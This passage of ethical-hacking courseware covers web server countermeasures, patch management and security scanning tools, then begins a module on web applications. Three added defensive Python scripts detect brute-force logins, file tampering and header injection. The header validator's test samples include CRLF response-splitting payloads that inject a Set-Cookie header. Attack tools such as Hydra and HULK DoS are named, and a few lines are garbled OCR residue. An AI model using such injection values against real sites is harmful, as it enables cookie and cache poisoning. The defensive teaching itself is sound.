Immunity's CANVAS provides penetration testers and security professionals with hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework. It provides features such as client-side exploitation, privilege escalation, HTTP tunneled privilege escalation, remote kernel exploitation, advanced backdoor technology, and advanced web attack technology.

The following are some additional web server attack tools:
- THC Hydra (https://github.com)
- HULK DoS (https://github.com)
- MPack (https://sourceforge.net)
- w3af (http://w3af.org)
Module Flow: Web Server Concepts, Web Server Attacks, Web Server Attack Methodology, Web Server Attack Tools, Countermeasures, Patch Management, Web Server Security Tools
Countermeasures

In previous sections, we discussed the benefits of a well-informed web server security posture, the danger posed by web server attacks, the methodology used in web server attacks, and the tools that assist an attacker in performing web server attacks. This section discusses the tools and techniques used in securing web servers: the various methods to detect web server attacks, countermeasures, and defense techniques.
Place Web Servers in Separate Secure Server Security Segment on Network

An ideal web hosting network should be designed with at least three segments, namely, an Internet segment, a secure server security segment, often called the demilitarized zone (DMZ), and an internal network segment. The web server should be placed in the secure server security segment (DMZ) of the network, isolated from the public and internal networks.
Countermeasures: Patches and Updates

- Scan for existing vulnerabilities; patch and update the server software regularly.
- Before applying any service pack, hotfix, or security patch, read and peer review all relevant documentation.
- Apply all updates, regardless of their type, on an "as-needed" basis.
- Test service packs and hotfixes on a representative non-production environment prior to deployment in production.
- Ensure that service packs, hotfixes, and security patch levels are consistent on all domain controllers (DCs).
- Ensure that server outages are scheduled and that a complete set of backup tapes and emergency repair disks are available.
- Keep a back-out plan that allows the system and enterprise to return to their original state, prior to a failed implementation.
- Schedule periodic service-pack upgrades as part of operations maintenance and never trail by more than two service packs.
- Disable all unused script extension mappings.
- Avoid using default configurations that web servers are dispatched with.
- Use virtual patches in the organization because they provide additional identification/logging capabilities.
- Establish a disaster recovery plan to handle patch management failures.
Countermeasures: Protocols and Accounts

The following are various countermeasures for using secure protocols on web servers and for securing accounts.
- Disable unused default user accounts created during the installation of an OS.
- When creating a new web root directory, grant the appropriate (least possible) NT File System (NTFS) permissions to anonymous users of the IIS web server to access the web content.
- Eliminate unnecessary database users and stored procedures and follow the principle of least privilege for the database application to defend against SQL query poisoning.
- Use secure web permissions, NTFS permissions, and .NET Framework access control mechanisms including URL authorization.
- Slow down brute-force and dictionary attacks with strong password policies, and implement audits and alerts for login failures.
- Run processes using least privileged accounts as well as least privileged service and user accounts.
- Limit the administrator or root-level access to the minimum number of users and maintain a record of the same.
- Maintain logs of all user activity in an encrypted form on the web server or in a separate machine on the intranet.
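The login-failure audit in the list above and the brute-force tools (Hydra, Ncrack) described under Web Server Password Hacking meet in the access log. The following Python script is an added example, not part of the courseware: it parses Apache combined-format log lines, keeps a sliding window of 401 responses on the login URL per source address, raises an alert when the window reaches a threshold, and notes whether a successful login followed the failures, which is what turns a noisy alert into an incident. The log lines, addresses and login path are constructed.

```python
"""Spot password guessing against a web login in access logs: alert when one
source produces many failed logins inside a short window. Added example, not
part of the courseware; the log lines are constructed in Apache combined
format with documentation-range addresses."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

SAMPLE_LOG = """\
203.0.113.7 - - [19/Nov/2019:20:50:01 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2019:20:50:02 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Nov/2019:20:50:02 +0000] "GET /index.html HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2019:20:50:03 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2019:20:50:04 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2019:20:50:05 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Nov/2019:20:50:06 +0000] "POST /admin/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Nov/2019:20:55:00 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Nov/2019:21:10:00 +0000] "POST /admin/login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields of one combined-format line, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bruteforce(log_text, login_path="/admin/login", threshold=5,
                      window=timedelta(seconds=60)):
    """One alert per source IP whose failed logins (401 on login_path) reach
    `threshold` within any `window`; success_after marks whether the same
    source then received a non-401 answer, i.e. a guess may have worked."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["status"] == 401:
            recent = failures[ip]
            recent.append(ts)
            while ts - recent[0] > window:    # drop failures outside the window
                recent.popleft()
            if len(recent) >= threshold and ip not in alerts:
                alerts[ip] = {"ip": ip, "failures": len(recent),
                              "first": recent[0], "last": ts,
                              "success_after": False}
        elif ip in alerts:
            alerts[ip]["success_after"] = True
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(f"{alert['ip']}: {alert['failures']} failed logins between "
              f"{alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}, "
              f"success afterwards: {alert['success_after']}")
```

Threshold and window are the policy knobs the countermeasure leaves to the administrator; the second address in the sample, with two failures a quarter of an hour apart, shows why a window is needed at all rather than a plain count.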
Countermeasures: Files and Directories

The following countermeasures can be adopted for securing files and directories on a web server.
- Eliminate unnecessary files within .jar files.
- Eliminate sensitive configuration information within the bytecode.
- Avoid mapping virtual directories between two different servers or over a network.
- Monitor and check all network services logs, website access logs, database server logs (e.g., Microsoft SQL Server, MySQL, and Oracle), and OS logs frequently.
- Disable the serving of directory listings.
- Eliminate non-web files such as archive files, backup files, text files, and header/include files.
- Disable the serving of certain file types by creating a resource map.
- Ensure that web applications or website files and scripts are stored in a partition or drive separate from that of the OS, logs, and any other system files.
- Run the web server within a sandbox directory for preventing access to system files.
- Avoid all non-web file types from being referenced in a URL.
Detecting Web Server Hacking Attempts

An attacker who gains access to a web server by compromising security through known vulnerabilities present in the web server may attempt to plant backdoors (scripts). These backdoors allow the attacker to gain access, launch phishing attacks, or send spam emails. The victim remains unaware of the web server attack until the server is blacklisted on spam mails or until the attacker redirects the visitors of a target site hosted on the web server to some other site. Thus, a web server attack is difficult to detect unless such malicious events occur. By the time these events occur, it may be too late to react because the attacker would have already succeeded. Therefore, a mechanism to detect a web server hacking attempt in its early stages is required to prevent harm to the web server.

When an attacker installs a backdoor on a web server, the size of files infected with the backdoor automatically increases. A website change detection system (WDS) is a script that runs on the server to detect changes made to any executable file or the presence of any new file on the web server, such as HTML, JavaScript (JS), PHP, Active Server Pages (ASP), Perl, and Python files. It works by periodically comparing the hash values of the files on the server with their respective master hash values to detect any changes to the codebase. If it detects any change on the server, it alerts the user to take necessary action. Thus, WDS helps in detecting web server hacking attempts in the early stages of an attack. For example, Directory Monitor is an automated tool that goes through entire web folders, detects any changes made to the codebase, and alerts the user through an email.
ical andCountermensores
Mackin ©by E-Comel
Copyright
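A minimal website change detection system of the kind described above, as an added example that is neither the book's code nor the Directory Monitor tool it names: it stores master SHA-256 hashes of the web files and reports new, modified and deleted files on each comparison. The watched extension set, the baseline file name and the constructed sample web root are assumptions.

```python
"""Minimal WDS: baseline SHA-256 hashes of web files, then diff the current
state against the baseline. Added example, not vendor code."""
import hashlib
import json
import os
import tempfile

# Script/page types the text names as targets for planted backdoors (assumed set).
WATCHED_EXTENSIONS = {".html", ".htm", ".js", ".php", ".asp", ".pl", ".py"}


def file_sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(webroot):
    """Return {relative_path: (sha256, size)} for every watched file under webroot."""
    result = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WATCHED_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, webroot).replace(os.sep, "/")
            result[rel] = (file_sha256(full), os.path.getsize(full))
    return result


def save_baseline(snap, baseline_path):
    # The master hashes must live outside the web root, ideally read-only,
    # or an intruder could simply re-baseline after tampering.
    with open(baseline_path, "w") as f:
        json.dump(snap, f, indent=2, sort_keys=True)


def load_baseline(baseline_path):
    with open(baseline_path) as f:
        return {k: tuple(v) for k, v in json.load(f).items()}


def compare(baseline, current):
    """Diff two snapshots into sorted lists of new, modified and deleted paths."""
    new = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p][0] != current[p][0])
    return {"new": new, "modified": modified, "deleted": deleted}


def demo():
    """Constructed scenario: baseline a tiny web root, then alter it."""
    root = tempfile.mkdtemp()
    baseline_file = os.path.join(tempfile.mkdtemp(), "master_hashes.json")
    os.makedirs(os.path.join(root, "inc"))
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "inc", "app.js"), "w") as f:
        f.write("console.log('ok');\n")
    with open(os.path.join(root, "readme.txt"), "w") as f:
        f.write("not a watched type\n")
    save_baseline(snapshot(root), baseline_file)

    # What the text describes an intrusion leaving behind: an existing script
    # grows (code appended to it) and an unexpected new script file appears.
    with open(os.path.join(root, "index.php"), "a") as f:
        f.write("// appended line\n")
    with open(os.path.join(root, "inc", "extra.php"), "w") as f:
        f.write("<?php /* new file */ ?>\n")

    report = compare(load_baseline(baseline_file), snapshot(root))
    for kind, paths in report.items():
        for p in paths:
            print("ALERT %-8s %s" % (kind, p))   # hook an email/alert here
    return report


if __name__ == "__main__":
    demo()
```

Run the comparison from a scheduler (cron, a systemd timer) at the interval you want; the alert lines are where an email notification would be wired in.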
How to Defend Against Web Server Attacks
How to Defend Against Web Server Attacks (Cont'd)
The following are some of the measures to avoid attacks such as MITM.
- Use the direct validation of certificates.
- Use a novel protocol that does not depend on third parties for certificate validation.
- Allow domains to directly and securely examine their certificates by using previously established user authentication credentials.
- Use a robust cryptographic construction that enhances server identity validation and resolves the limitations of third-party solutions.
- Ensure that the certificate data ranges are valid and that certificates are used for their intended purpose.
- Ensure that the certificate has not been revoked and that the certificate's public key is valid all the way to a trusted root authority.
Machine.config
The machine.config file provides a mechanism of securing information by changing machine-level settings. It affects all other applications. The machine.config file includes machine settings for the .NET framework, which affect the security. The following can be performed with the machine.config file:
- Ensure that protected resources are mapped to HttpForbiddenHandler and that unused HttpModules are removed.
Code Access Security
The following measures can be adopted to ensure code access security:
- Implement secure coding practices to avoid source-code disclosure and input validation attacks.
- Restrict code access security policy settings to ensure that there are no permissions to execute code downloaded from the Internet or intranet.
- Configure IIS to reject URLs with "../" to prevent path traversal, lock down system commands and utilities with restrictive access control lists (ACLs), and install new patches and updates.
If targets do not implement code access security in their web servers, then there is a possibility of execution of malicious code.
The following are some other measures to defend against web server attacks.
- Apply restricted ACLs and block remote registry administration.
- Secure the SAM (stand-alone servers only).
- Ensure that security-related settings are configured appropriately and that access to the metabase file is restricted with hardened NTFS permissions.
- Remove unnecessary Internet Server Application Programming Interface (ISAPI) filters from the web server.
- Remove all unnecessary file shares, including the default administration shares, if they are not required.
- Secure the shares with restricted NTFS permissions.
- Relocate sites and virtual directories to non-system partitions and use IIS web permissions to restrict access.
- Remove all unnecessary IIS script mappings for optional file extensions to avoid exploitation of any bugs in the ISAPI extensions that handle these types of files.
- Enable a minimum level of auditing on the web server and use NTFS permissions to protect log files.
- Use a dedicated machine as a web server.
- Create URL mappings to internal servers cautiously.
- Do not install the IIS server on a domain controller.
- Use server-side session ID tracking and match connections with timestamps, IP addresses, etc.
- If a database server, such as Microsoft SQL Server, is to be used as a backend database, install it on a separate server.
- Use security tools provided with web server software and scanners that automate and simplify the process of securing a web server.
- Physically protect the web server machine in a secure machine room.
- Do not connect an IIS Server to the Internet until it is fully hardened.
- Do not allow anyone to locally log in to the machine except the administrator.
- Configure a separate anonymous user account for each application, if multiple web applications are hosted.
How to Defend against HTTP Response-Splitting and Web Cache Poisoning
Server Admin
- Use the latest web server software.
- Regularly update/patch the OS and web server.
- Run a web vulnerability scanner.
- Restrict the web application's access to unique IPs.
- Disallow CR (%0d or \r) and LF (%0a or \n) characters.
- Comply with RFC 2616 specifications for HTTP/1.1.
- Parse all user inputs or other forms of encoding before using them in HTTP headers.
Proxy Servers
- Avoid sharing incoming TCP connections among different clients.
- Use different TCP connections with the proxy for different virtual hosts.
- Implement "maintain request host header" correctly.
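The two header-handling rules above (parse every layer of encoding first, then refuse CR/LF) as an added Python example that is not part of the book; the `build_redirect` function, the three-round decode limit and the constructed sample inputs are assumptions for illustration.

```python
"""Validate a user-supplied value before it is placed in an HTTP response
header, so a CR/LF (raw, %-encoded, or double-encoded) cannot start a second
header or a second response. Added example, not the book's code."""
import re
from urllib.parse import quote, unquote

MAX_DECODE_ROUNDS = 3   # assumption: bound on nested %-decoding (e.g. %250d)
# Any ASCII control character, which covers CR (0x0d, %0d) and LF (0x0a, %0a).
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


class HeaderInjectionError(ValueError):
    pass


def fully_decode(value):
    """Percent-decode until the value stops changing.
    Returns (decoded, exhausted); exhausted=True means it never settled."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return decoded, False
        value = decoded
    return value, True


def safe_header_value(raw):
    """Return the fully decoded value if it is safe for a header, else raise."""
    decoded, exhausted = fully_decode(raw)
    if exhausted:
        raise HeaderInjectionError("value did not settle after decoding")
    if CONTROL_CHARS.search(decoded):
        raise HeaderInjectionError("CR/LF or control character in header value")
    return decoded


def build_redirect(lang):
    """Echo a 'lang' parameter into a Location header, the pattern response
    splitting usually abuses; here the value is validated, then re-encoded
    for the URL context it is embedded in. Returns [(name, value)]."""
    lang = safe_header_value(lang)
    return [("Location", "/page.html?lang=" + quote(lang, safe=""))]


def check_samples(samples):
    """Classify each constructed input as 'ok' or 'rejected'."""
    verdict = {}
    for s in samples:
        try:
            safe_header_value(s)
            verdict[s] = "ok"
        except HeaderInjectionError:
            verdict[s] = "rejected"
    return verdict


# Constructed inputs: benign values plus the encodings the text lists.
SAMPLES = [
    "en",                                   # benign
    "fr-CA",                                # benign
    "en%0d%0aSet-Cookie:%20admin=1",        # %-encoded CRLF
    "en\r\nX-Injected: 1",                  # raw CRLF
    "en%250d%250aX-Injected:%201",          # double-encoded CRLF
]

if __name__ == "__main__":
    for value, result in check_samples(SAMPLES).items():
        print("%-8s %r" % (result, value))
```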
How to Defend against DNS Hijacking
The following techniques can be used to defend against DNS hijacking.
- Set up alerts.
- Install an antivirus program and update it regularly.
- Change the default router password.
- Avoid downloading audio and video codecs and other downloaders from untrusted websites.
- Configuring a Master-Slave DNS within your Network: Use a master-slave DNS and configure the master without Internet access. Maintain two slave servers so that even if an attacker hacks a slave, it will update only when it receives an update from the master.
- Constant Monitoring of DNS Servers: The constant monitoring of DNS servers ensures that a domain name returns the correct IP address.
- Ensure Router Safety: Change the default username and password of the router. Keep the firmware up to date for ensuring safety from new vulnerabilities.
- Use VPN Service: Establish virtual private network (VPN)-encrypted tunnels for secure private communication over the Internet. This feature protects messages from eavesdropping and unauthorized access.
Module Flow: Patch Management, Web Server Security Tools
Patch Management
Developers always attempt to find bugs in a web server and fix them. Bug fixes are distributed in the form of patches, which provide protection against known vulnerabilities. Unpatched or vulnerable patches can create a security loophole in the web server. This section describes the role of patches, upgrades, and hotfixes in securing web servers. This section also provides guidance for choosing proper patches, upgrades, and hotfixes, and their appropriate sources for secure patch management.
Patches and Hotfixes
A patch is a small piece of software designed to fix problems, security vulnerabilities, and bugs as well as improve the usability or performance of a computer program or its supporting data. A patch can be considered a repair job for a programming problem. A software vulnerability is the weakness of a software program that makes it susceptible to malware attacks. Software vendors provide patches that prevent exploitations and reduce the probability of threats exploiting a specific vulnerability. Patches include fixes and updates for multiple known bugs or issues. A patch is a publicly released update that is available for all customers. A system without patches is much more vulnerable to attacks than a regularly patched system. If an attacker can identify a vulnerability before it is fixed, then the system might be susceptible to malware attacks.
A hotfix is a package used to address a critical defect in a live environment and contains a fix for a single issue. It updates a specific product version. Hotfixes provide quick solutions and ensure that the issues are resolved. Apply hotfixes to software patches on production systems.
Vendors update users about the latest hotfixes through email or make them available on their official website. Hotfixes are updates that fix a specific customer issue and are not always distributed outside the customer organization. Vendors occasionally deliver hotfixes as a set of fixes called a combined hotfix or service pack.
What is Patch Management?
Patch management is a process used to fix known vulnerabilities by ensuring that the appropriate patches are installed on a system. It involves the following tasks:
- Choosing, verifying, testing, and applying patches
- Updating previously applied patches with current patches
- Listing patches applied previously to the current software
- Recording repositories or depots of patches for easy selection
- Assigning and deploying the applied patches
An automated patch management process includes the following steps.
- Detect: Use tools to detect missing security patches.
- Assess: Assess the issue(s) and its associated severity by mitigating the factors that may influence the decision.
- Acquire: Download the patch for testing.
- Test: Install the patch first on a test machine to verify the consequences of the update.
- Deploy: Deploy the patch to computers and ensure that applications are not affected.
- Maintain: Subscribe to receive notifications about vulnerabilities when they are reported.
Installation of a Patch
The installation of a patch entails the following tasks.
- Identifying Appropriate Sources for Updates and Patches
It is important to identify appropriate sources for updates and patches. Patches and updates that are not installed from trusted sources can render the target server even more vulnerable to attacks, instead of hardening its security. Thus, the selection of appropriate sources for updates and patches plays a vital role in securing web servers. The following are some methods for identifying appropriate sources for updates and patches.
  - Create a patch management plan that fits the operational environment and business objectives.
  - Find appropriate updates and patches on the home sites of the applications or OS vendors.
  - The recommended method of tracking issues relevant to proactive patching is to register to the home sites to receive alerts.
- Installation of a Patch
Users can access and install security patches via the World Wide Web. Patches can be installed in two ways.
  - Manual Installation: In this method, the user downloads the patch from the vendor and installs it.
  - Automatic Installation: In this method, applications use an auto update feature to update themselves.
- Implementation and Verification of a Security Patch or Upgrade
  - Before installing any patch, verify the source.
Patch Management Tools
- GFI LanGuard
Source: https://www.gfi.com
The GFI LanGuard patch management software scans the user's network automatically as well as installs and manages security and non-security patches. It supports machines across Microsoft®, MAC OS X®, and Linux® operating systems, as well as many third-party applications. It allows auto-downloads of missing patches as well as patch rollback, resulting in a consistently configured environment that is protected from threats and vulnerabilities.
Figure 13.45: Screenshot of GFI LanGuard
The following are some additional patch management tools:
- Symantec Client Management Suite (https://www.symantec.com)
- SolarWinds Patch Manager (https://www.solarwinds.com)
- Kaseya Patch Management (https://www.kaseya.com)
- Software Vulnerability Manager (https://www.flexerasoftware.com)
- Ivanti Patch for Endpoint Manager (https://www.ivanti.com)
Module Flow: Web Server Concepts, Web Server Attacks, Patch Management, Web Server Security Tools
Web Application Security Scanners
- Syhunt Hybrid
Source: http://www.syhunt.com
The Syhunt Hybrid scanner automates web application security testing and guards the organization's web infrastructure against web application security threats. Syhunt Dynamic crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks. Syhunt Hybrid creates signatures to detect application vulnerabilities and prevents logout. It analyzes JavaScript (JS), logs suspicious responses, and tests errors for review.
Figure 13.46: Screenshot of Syhunt Hybrid web application security scanner
- N-Stalker X
Source: https://www.nstalker.com
N-Stalker is a web application security scanner that searches for vulnerabilities to attacks such as clickjacking, SQL injection, and XSS. It allows spider crawling throughout the application and the creation of web macros for form authentication. It also provides proxy capabilities for "drive-thru" attacks and identifies components through reverse proxies that distribute different platforms in the same application URL.
Figure 13.47: Screenshot of N-Stalker X
The following are some additional web application security scanners:
- Netsparker (https://www.netsparker.com)
- Burp Suite (https://www.portswigger.net)
- Wapiti (http://wapiti.sourceforge.net)
- Webscarab (https://www.owasp.org)
- WPSec (https://wpsec.com)
- Tinfoil Security (https://www.tinfoilsecurity.com)
- Skipfish (https://code.google.com)
- Detectify (https://detectify.com)
- Fortify on Demand (https://www.microfocus.com)
- OWASP Zed Attack Proxy (ZAP) (https://www.zaproxy.org)
- SonarQube (https://www.sonarqube.org)
- Arachni (https://www.arachni-scanner.com)
- w3af (http://w3af.org)
- Grabber (http://rgaucher.info/beta/grabber)
- Vega (https://subgraph.com)
Web Server Security Scanners
- ScanMyServer
Source: https://www.scanmyserver.com
ScanMyServer is used to find security vulnerabilities in a website or web server. It can generate comprehensive security test reports and assist in fixing problems that might exist in a company's website or web server.
Figure 13.48: Screenshot of ScanMyServer
The following are some additional web server security scanners:
- Qualys Community Edition (https://www.qualys.com)
- Observatory (https://observatory.mozilla.org)
- WordPress Security Scan (https://hackertarget.com)
- Web Vulnerability Scanner (https://pentest-tools.com)
- Nikto2 (https://cirt.net)
Web Server Malware Infection Monitoring Tools
- QualysGuard Malware Detection
Source: https://www.qualys.com
QualysGuard Malware Detection allows organizations to proactively scan their websites for malware and provides automated alerts and in-depth reporting to enable prompt identification and resolution. It enables organizations to protect their customers from malware infections and safeguard their brand reputation.
Figure 13.49: Screenshot of QualysGuard Malware Detection
The following are some additional web server malware infection monitoring tools:
- Sucuri SiteCheck (https://sucuri.net)
- SiteLock SMART (https://www.sitelock.com)
- Quttera (https://www.quttera.com)
- Web Inspector (https://www.webinspector.com)
- SiteGuarding (https://www.siteguarding.
Web Server Security Tools
- Fortify WebInspect
Source: http://www.microfocus.com
Fortify WebInspect is an automated dynamic testing solution that discovers configuration issues as well as identifies and prioritizes security vulnerabilities in running applications. It mimics real-world hacking techniques and provides a comprehensive dynamic analysis of complex web applications and services. WebInspect dashboards and reports provide organizations with visibility and an accurate risk posture of its applications.
Figure 13.50: Screenshot of Fortify WebInspect
The following are some additional web server security tools:
- Acunetix Web Vulnerability Scanner (https://www.acunetix.com)
- Retina Host Security Scanner (https://www.beyondtrust.com)
- NetIQ Secure Configuration Manager (https://www.netiq.com)
- SAINT Security Suite (https://www.carson-saint.com)
- Sophos Intercept X for Server (https://www.sophos.com)
Web Server Pen Testing Tools
- CORE Impact
Source: https://www.coresecurity.com
CORE Impact finds vulnerabilities in an organization's web server. This tool allows a user to evaluate the security posture of a web server by using the same techniques currently employed by cyber criminals. It scans for possible vulnerabilities in the web server, imports scan results, and runs exploits to test the identified vulnerabilities. It can also scan network servers, workstations, firewalls, routers, and various applications for vulnerabilities; identify which vulnerabilities pose real threats to the network; determine the potential impact of exploited vulnerabilities; and prioritize and execute remediation efforts.
Figure 13.51: Screenshot of CORE Impact
The following are some additional web server pen testing tools:
- Immunity CANVAS (https://www.immunityinc.com)
- Arachni (https://www.arachni-scanner.com)
- WebSurgery (http://sunrisetech.gr)
Module Summary
In this module, we discussed in detail general concepts related to web servers; various web server threats and attacks; the web server attack methodology, which includes information gathering, web server footprinting, website mirroring, vulnerability scanning, session hijacking, and web server password hacking; and various web server hacking tools. Additionally, we discussed various countermeasures that can be employed to prevent web server hacking attempts by threat actors. We also discussed patch management concepts. This module ended with a detailed discussion on how to secure web servers using various security tools.
In the next module, we will discuss in detail how attackers, as well as ethical hackers and pen testers, hack web applications.
Certified Ethical Hacker
Module 14: Hacking Web Applications
Module Objectives
The evolution of the Internet and web technologies, combined with rapidly increasing Internet connectivity, has led to the emergence of a new business landscape. Web applications are an integral component of online businesses. Everyone connected via the Internet is using various web applications for different purposes, including email, chats, online shopping, and social networking.
Web applications are becoming increasingly vulnerable to more sophisticated threats and attack vectors. This module will familiarize you with various web applications and web attack vectors as well as how to protect an organization's information resources from them. It describes the general web application hacking methodology that most attackers use to exploit a target system. Ethical hackers can use this methodology to assess their organization's security against web application attacks. This module will also familiarize you with web API, webhooks, and web shell concepts as well as hacking. In addition, it discusses several tools that are useful in different stages of web application security assessment.
At the end of this module, you will be able to:
- Describe web application concepts
- Perform various web application attacks
- Describe the web application hacking methodology
- Use different web application hacking tools
- Explain web API, webhooks, and web shell concepts
- Understand how to hack web applications via web API, webhooks, and web shells
- Adopt countermeasures against web application attacks
- Use different web application security testing tools
Module Flow: Web Application Concepts, Web Application Threats, Web Application Hacking Methodology, Web API, Webhooks, and Web Shell, Web Application Security
Web Application Concepts
This section describes the basic concepts associated with web applications vis-à-vis security concerns: their components, how they work, their architecture, and so on. Furthermore, it provides insights into web services and vulnerability stacks.
Introduction to Web Applications
Web applications are software programs that run on web browsers and act as the interface between users and web servers through web pages. They enable the users to request, submit, and retrieve data to/from a database over the Internet by interacting through a user-friendly graphical user interface (GUI). Users can input data via a keyboard, mouse, or touch interface depending on the device they are using to access the web application. Based on browser-supported programming languages such as JavaScript, HTML, and CSS, web applications work in combination with other programming languages such as SQL to access data from the databases. Web applications are developed as dynamic web pages, and they allow users to communicate with servers using server-side scripts. They allow users to perform specific tasks such as searching, sending emails, connecting with friends, online shopping, and tracking and tracing. Furthermore, there are several desktop applications that provide users with the flexibility to work with the Internet.
Entities develop various web applications to offer their services to users via the Internet. Whenever users need to access such services, they can request them by submitting the Uniform Resource Identifier (URI) or Uniform Resource Locator (URL) of the web application in a browser. The browser passes this request to the server, which stores the web application data and displays it in the browser. Some popular web servers are Microsoft IIS, Apache HTTP Server, H2O, LiteSpeed, Cherokee, etc.
Increasing Internet usage and expanding online businesses have accelerated the development and ubiquity of web applications across the globe. A key factor in the adoption of web applications for business purposes is the multitude of features they offer. Moreover, they are secure and relatively easy to develop. In addition, they offer better services than many computer-based software applications and are easy to install, maintain, and update.
The advantages of web applications are listed below:
- As they are independent of the operating system, their development and troubleshooting are easy and cost-effective.
- They are accessible anytime and anywhere using a computer with an Internet connection.
- The user interface is customizable, making it easy to update.
- Users can access them on any device having an Internet browser, including PDAs, smartphones, etc.
- Dedicated servers, monitored and managed by experienced server administrators, store all the web application data, allowing developers to increase their workload.
- Multiple locations of servers not only increase physical capacity but also reduce the security burden of monitoring thousands of desktops using the program.
- They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL Server, .NET, and scripting languages, which are scalable and support even portable platforms.
Although web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, and session hijacking.
How Web Applications Work
The main function of web applications is to fetch user-requested data from a database. When a user clicks or enters a URL in a browser, the web application immediately displays the requested website content in the browser. This mechanism involves the following steps:
- First, the user enters the website name or URL in the browser. Then, the user's request is sent to the web server.
- On receiving the request, the web server checks the file extension:
  - If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.
  - If the user requests a web page with an extension such as php, asp, and cfm that needs to be processed at the server side, then the web application server must process the request. Therefore, the web server passes the user's request to the web application server, which processes the user's request.
- The web application server then accesses the database to perform the requested task by updating or retrieving the information stored on it.
- After processing the request, the web application server finally sends the results to the web server, which in turn sends the results to the user's browser.
Figure 14.1: Working of web applications
Web Application Architecture
Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of the web application depends on its architecture, which includes hardware and software that perform tasks such as reading the request as well as searching, gathering, and displaying the required data.
The web application architecture includes different devices, web browsers, and external web services that work with different scripting languages to execute the web application. It consists of three layers:
1. Client or presentation layer
2. Business logic layer
3. Database layer
The client or presentation layer includes all physical devices present on the client side, such as laptops, smartphones, and computers. These devices feature operating systems and compatible browsers, which enable users to send requests for required web applications. The user requests a website by entering a URL in the browser, and the request travels to the web server. The web server then responds to the request and fetches the requested data; the application finally displays this response in the browser in the form of a web page.
The "business logic" layer itself consists of two layers: the web-server logic layer and the business logic layer. The web-server logic layer contains various components such as a firewall, an HTTP request parser, a proxy caching server, an authentication and login handler, a resource handler, and a hardware component, e.g., a server. The firewall offers security to the content, the HTTP request parser handles requests coming from clients and forwards responses to them, and the resource handler is capable of handling multiple requests simultaneously. The web-server logic layer contains code that reads data from the browser and returns the results (e.g., IIS Web Server, Apache Web Server).
The business logic layer includes the functional logic of the web application, which is implemented using technologies such as .NET, Java, and "middleware". It defines the flow of data, according to which the developer builds the application using programming languages. It stores the application data and integrates legacy applications with the latest functionality of the application. The server needs a specific protocol to access user-requested data from its database. This layer contains the software and defines the steps to search and fetch the data.
The database layer consists of cloud services, a B2B layer that holds all the commercial transactions, and a database server that supplies an organization's production data in a structured form (e.g., MS SQL Server, MySQL server).
Figure 14.2: Web Application Architecture
WebServices
Aweb service is an application
or softwarethat is deployed over the Internet.It usesa standard
messaging protocol (suchas SOAP) to enablecommunication betweenapplications developed
on different platforms.
For instance,Java-based services can interact with PHPapplications.
web-basedapplications
‘These are integratedwith SOAP, UDDI,WSDL, and RESTacross the
network.
Web Service Architecture

A web service architecture describes the interactions among the service provider, service requester, and service registry. These interactions consist of three operations, namely publish, find, and bind. All these roles and operations work together on web service artifacts known as software modules (services) and their descriptions.

- Service Provider: It is a platform from where services are provided.
- Service Requester: It is an application or client that is seeking a service or trying to establish communication with a service. In general, the browser is a requester, which invokes the service on behalf of a user.
- Service Registry: It is the place where the provider loads service descriptions. The service requester discovers the service and retrieves binding data from the service descriptions.
There are three operations in a web service architecture:

- Publish: During this operation, service descriptions are published to allow the requester to discover the services.
- Find: During this operation, the requester tries to obtain the service descriptions. This operation can be processed in two different phases: obtaining the service interface description at development time and obtaining the binding and location description calls at run time.
- Bind: During this operation, the requester calls and establishes communication with the services during run time, using binding data inside the service descriptions to locate and invoke the services.
There are two artifacts in a web service architecture: the service itself (a software module) and its service description.

